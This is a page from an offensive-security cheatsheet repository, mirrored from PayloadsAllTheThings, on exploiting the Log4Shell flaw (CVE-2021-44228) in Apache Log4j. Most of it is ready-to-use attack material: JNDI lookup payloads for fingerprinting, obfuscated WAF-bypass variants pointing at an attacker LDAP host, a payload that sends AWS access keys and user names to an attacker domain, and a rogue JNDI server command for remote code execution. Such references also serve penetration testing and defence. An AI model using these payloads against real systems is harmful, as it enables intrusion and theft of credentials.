daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

log4shell.md (5105B)


      1 ---
      2 title: "CVE-2021-44228 Log4Shell"
      3 topic: "CVE Exploits"
      4 topicSlug: "cve-exploits"
      5 sourcePath: "CVE Exploits/Log4Shell.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/CVE%20Exploits/Log4Shell.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # CVE-2021-44228 Log4Shell
     12 
     13 > Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled
     14 
     15 ## Summary
     16 
     17 * [Vulnerable code](#vulnerable-code)
     18 * [Payloads](#payloads)
     19 * [Scanning](#scanning)
     20 * [WAF Bypass](#waf-bypass)
     21 * [Exploitation](#exploitation)
     22     * [Environment variables exfiltration](#environment-variables-exfiltration)
     23     * [Remote Command Execution](#remote-command-execution)
     24 * [References](#references)
     25 
     26 ## Vulnerable code
     27 
     28 You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn](
     29 https://github.com/leonjza/log4jpwn)
     30 
     31 ```java
     32 public String index(@RequestHeader("X-Api-Version") String apiVersion) {
     33     logger.info("Received a request for API version " + apiVersion);
     34     return "Hello, world!";
     35 }
     36 ```
     37 
     38 ## Payloads
     39 
     40 ```bash
     41 # Identify Java version and hostname
     42 ${jndi:ldap://${java:version}.domain/a}
     43 ${jndi:ldap://${env:JAVA_VERSION}.domain/a}
     44 ${jndi:ldap://${sys:java.version}.domain/a}
     45 ${jndi:ldap://${sys:java.vendor}.domain/a}
     46 ${jndi:ldap://${hostName}.domain/a}
     47 ${jndi:dns://${hostName}.domain}
     48 
     49 # More enumerations keywords and variables
     50 java:os
     51 docker:containerId
     52 web:rootDir
     53 bundle:config:db.password
     54 ```
     55 
     56 ## Scanning
     57 
     58 * [fullhunt/log4j-scan](https://github.com/fullhunt/log4j-scan) - Log4Shell scanning utility
     59 
     60     ```powershell
     61     usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
     62                         [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
     63     python3 log4j-scan.py -u http://10.10.10.10:8081 --run-all-test
     64     python3 log4j-scan.py -u http://10.10.10.10:8080 --waf-bypass
     65     ```
     66 
     67 * [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml)
     68 
     69 ## WAF Bypass
     70 
     71 ```powershell
     72 ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://10.10.10.10:1389/a}
     73 
     74 # using lower and upper
     75 ${${lower:jndi}:${lower:rmi}://10.10.10.10:1389/poc}
     76 ${j${loWer:Nd}i${uPper::}://10.10.10.10:1389/poc}
     77 ${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
     78 
     79 # using env to create the letter
     80 ${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//[ATTACKER.DOMAIN.TLD]/a}
     81 ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//[ATTACKER.DOMAIN.TLD]/a}
     82 ```
     83 
     84 ## Exploitation
     85 
     86 ### Environment variables exfiltration
     87 
     88 ```powershell
     89 ${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/
     90 
     91 # AWS Access Key
     92 ${jndi:ldap://${env:USER}.${env:USERNAME}.[ATTACKER.DOMAIN.TLD]:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY}
     93 ```
     94 
     95 ### Remote Command Execution
     96 
     97 * [artsploit/rogue-jndi](https://github.com/artsploit/rogue-jndi) - Rogue JNDI LDAP/RMI exploitation server
     98 
     99     ```ps1
    100     java -jar target/RogueJndi-1.1.jar --command "whoami" --hostname "10.10.10.10"
    101     Mapping ldap://10.10.10.11:1389/ to artsploit.controllers.RemoteReference
    102     Mapping ldap://10.10.10.11:1389/o=reference to artsploit.controllers.RemoteReference
    103     Mapping ldap://10.10.10.11:1389/o=tomcat to artsploit.controllers.Tomcat
    104     Mapping ldap://10.10.10.11:1389/o=groovy to artsploit.controllers.Groovy
    105     Mapping ldap://10.10.10.11:1389/o=websphere1 to artsploit.controllers.WebSphere1
    106     Mapping ldap://10.10.10.11:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
    107     Mapping ldap://10.10.10.11:1389/o=websphere2 to artsploit.controllers.WebSphere2
    108     Mapping ldap://10.10.10.11:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2
    109     ```
    110 
    111 * [pimps/JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit) - JNDI exploitation helper toolkit
    112 
    113 ## References
    114 
    115 * [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - LunaSec - December 12, 2021](https://web.archive.org/web/20240619113824/https://www.lunasec.io/docs/blog/log4j-zero-day/)
    116 * [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - LunaSec - December 14, 2021](https://web.archive.org/web/20240511165624/https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/)
    117 * [PSA: Log4Shell and the current state of JNDI injection - Moritz Bechler - December 10, 2021](https://web.archive.org/web/20250903054130/https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/)